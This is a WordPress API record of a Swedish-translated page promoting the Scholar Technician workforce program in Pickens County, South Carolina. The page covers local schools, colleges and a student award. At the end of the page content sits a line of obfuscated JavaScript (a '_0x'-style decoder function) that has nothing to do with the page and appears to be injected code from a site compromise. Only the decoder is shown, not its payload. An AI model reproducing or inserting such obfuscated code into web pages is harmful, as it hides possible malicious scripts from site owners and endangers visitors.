{"id":6228,"date":"2020-10-28T14:30:10","date_gmt":"2020-10-28T14:30:10","guid":{"rendered":"http:\/\/alliancepickens.com\/arbetskraftsutveckling\/scholar-tekniker-program\/"},"modified":"2020-12-04T20:14:33","modified_gmt":"2020-12-04T20:14:33","slug":"scholar-tekniker-program","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/","title":{"rendered":"Scholar Tekniker Program"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]De flesta folk \u00e4r bekanta med Scholar Athlete. Vi k\u00e4nner igen honom som den unge mannen som kastar touchdowns p\u00e5 fredag kv\u00e4ll, eller den unga damen som spikar volleyboll \u00f6ver n\u00e4tet p\u00e5 tisdagskv\u00e4llar, som b\u00e5da dock ocks\u00e5 utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag.<\/p>\n<p>H\u00e4r i Pickens County.South Carolina.USA, vi utvecklar den unga person som vi kallar <em>Scholar Technician<\/em>. Pickens County <em>Scholar Technician<\/em> \u00e4r den student som utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag, men ocks\u00e5 genom <a href=\"http:\/\/alliancepickens.com\/news\/pickens_building___dynasty__in_mechatronics\">fritidsaktiviteter<\/a> och genom studiekurs, l\u00e4r sig och utvecklar tekniska f\u00e4rdigheter som kr\u00e4vs i dagens avancerade tillverkningsmilj\u00f6.<\/p>\n<p>Fr\u00e5n Dagis genom 12: e klass i v\u00e5ra Pickens County skolor, och genom \u00e5rskurserna 13 och 14 vid Tri-County Technical College, Pickens County.South Carolina.USA utvecklar Scholar Tekniker &#8230; och Utveckla en arbetskraft f\u00f6r dig![\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;21&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1605217238363{background: #1d2c68 url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/lowpoly.png?id=10282) !important;}&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400;color: #ffffff\">En v\u00e4lutbildad och h\u00f6gutbildad arbetskraft \u00e4r utm\u00e4rkande f\u00f6r Pickens County.South Carolina.USA. Hem f\u00f6r Scholar Technician, ger v\u00e5r arbetskraft utvecklingsprogram aff\u00e4rer i Pickens County en sann konkurrensf\u00f6rdel.<\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">Den Pickens County School District \u00e4r o\u00f6vertr\u00e4ffad i South Carolina, som den h\u00f6gst rankade countywide skoldistrikt i staten. Den Pickens County Karri\u00e4r och Technology Center har en historia av excellens som nummer ett praktisk l\u00e4rande anl\u00e4ggning i South Carolina. Det \u00e4r det enda centret med en 5-Axis maskin tillg\u00e4nglig f\u00f6r gymnasieelever.  <\/span><\/p>\n<p><span style=\"font-weight: 400;color: #ffffff\">Pickens County \u00e4r ocks\u00e5 hem till Clemson University, Southern Wesleyan University, och Tri-County Technical College, som erbjuder Pickens County f\u00f6retag en konkurrensf\u00f6rdel f\u00f6r att hitta v\u00e4lutbildade, kvalificerad arbetskraft.  <\/span>[\/vc_column_text][vc_empty_space][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_empty_space][vc_video link=&#8221;https:\/\/youtu.be\/VHz98MhiYo8&#8243;][vc_column_text el_class=&#8221;watchmore&#8221;]Titta p\u00e5 f\u00f6r att l\u00e4ra dig mer[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content&#8221; el_class=&#8221;callout&#8221;][vc_column width=&#8221;1\/2&#8243; el_class=&#8221;stembg&#8221; css=&#8221;.vc_custom_1605215870758{background-image: url(http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/scho2lar.jpg?id=10593) !important;}&#8221;][vc_empty_space height=&#8221;700px&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;techcopy&#8221;]<\/p>\n<h1><strong>Campbell utsedd <em>till \u00c5rets<\/em> l\u00e4rdtekniker<\/strong><\/h1>\n<h3>Jacob Campbell \u00e4r \u00e5rets forskare i Pickens <em>County<\/em> <strong> <\/strong>2019.<\/h3>\n<p>Priset delades ut som en del av den sjunde \u00e5rliga Pickens County STEM (vetenskap, teknik, teknik och matematik) &#8220;Evening of Celebration&#8221; p\u00e5 Pickens County Career and Technology Center f\u00f6r att erk\u00e4nna tekniska gymnasieelever.<\/p>\n<p>Den \u00e5rliga &#8220;Evening of Celebration&#8221; \u00e4r en del av v\u00e5r stipendietekniker str\u00e4van. Vid det evenemanget vi tilldela <em>Scholar Technician<\/em> of the Year, som \u00e4r Heisman Trophy f\u00f6r tekniskt utbildade Pickens County high school student som har visat en h\u00e4ngivenhet till sin skicklighet, en stark arbetsmoral och karakt\u00e4r och utv\u00e4rdering som g\u00f6rs av den privata sektorn.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1604355356070{background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}&#8221;][vc_column][vc_empty_space][vc_single_image image=&#8221;10264&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om utveckling av arbetskraften<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;21&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]De flesta folk \u00e4r bekanta med Scholar Athlete. Vi k\u00e4nner igen honom som den unge mannen som kastar touchdowns p\u00e5 fredag kv\u00e4ll, eller den unga damen som spikar volleyboll \u00f6ver n\u00e4tet p\u00e5 tisdagskv\u00e4llar, som b\u00e5da dock ocks\u00e5 utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag. H\u00e4r i Pickens County.South Carolina.USA, vi utvecklar den unga&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6067,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6228","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Scholar Tekniker Program - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Scholar Tekniker Program - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]De flesta folk \u00e4r bekanta med Scholar Athlete. Vi k\u00e4nner igen honom som den unge mannen som kastar touchdowns p\u00e5 fredag kv\u00e4ll, eller den unga damen som spikar volleyboll \u00f6ver n\u00e4tet p\u00e5 tisdagskv\u00e4llar, som b\u00e5da dock ocks\u00e5 utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag. H\u00e4r i Pickens County.South Carolina.USA, vi utvecklar den unga&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:33+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/scholar-tekniker-program\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/scholar-tekniker-program\\\/\",\"name\":\"Scholar Tekniker Program - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:10+00:00\",\"dateModified\":\"2020-12-04T20:14:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/scholar-tekniker-program\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/scholar-tekniker-program\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/scholar-tekniker-program\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Arbetskraftsutveckling\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/arbetskraftsutveckling\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Scholar Tekniker Program\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Scholar Tekniker Program - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/","og_locale":"sv_SE","og_type":"article","og_title":"Scholar Tekniker Program - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]De flesta folk \u00e4r bekanta med Scholar Athlete. Vi k\u00e4nner igen honom som den unge mannen som kastar touchdowns p\u00e5 fredag kv\u00e4ll, eller den unga damen som spikar volleyboll \u00f6ver n\u00e4tet p\u00e5 tisdagskv\u00e4llar, som b\u00e5da dock ocks\u00e5 utm\u00e4rker sig i klassrummet m\u00e5ndag till fredag. H\u00e4r i Pickens County.South Carolina.USA, vi utvecklar den unga&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:33+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/","url":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/","name":"Scholar Tekniker Program - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:30:10+00:00","dateModified":"2020-12-04T20:14:33+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/scholar-tekniker-program\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Arbetskraftsutveckling","item":"https:\/\/alliancepickens.com\/sv\/arbetskraftsutveckling\/"},{"@type":"ListItem","position":3,"name":"Scholar Tekniker Program"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6228"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6228\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6067"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}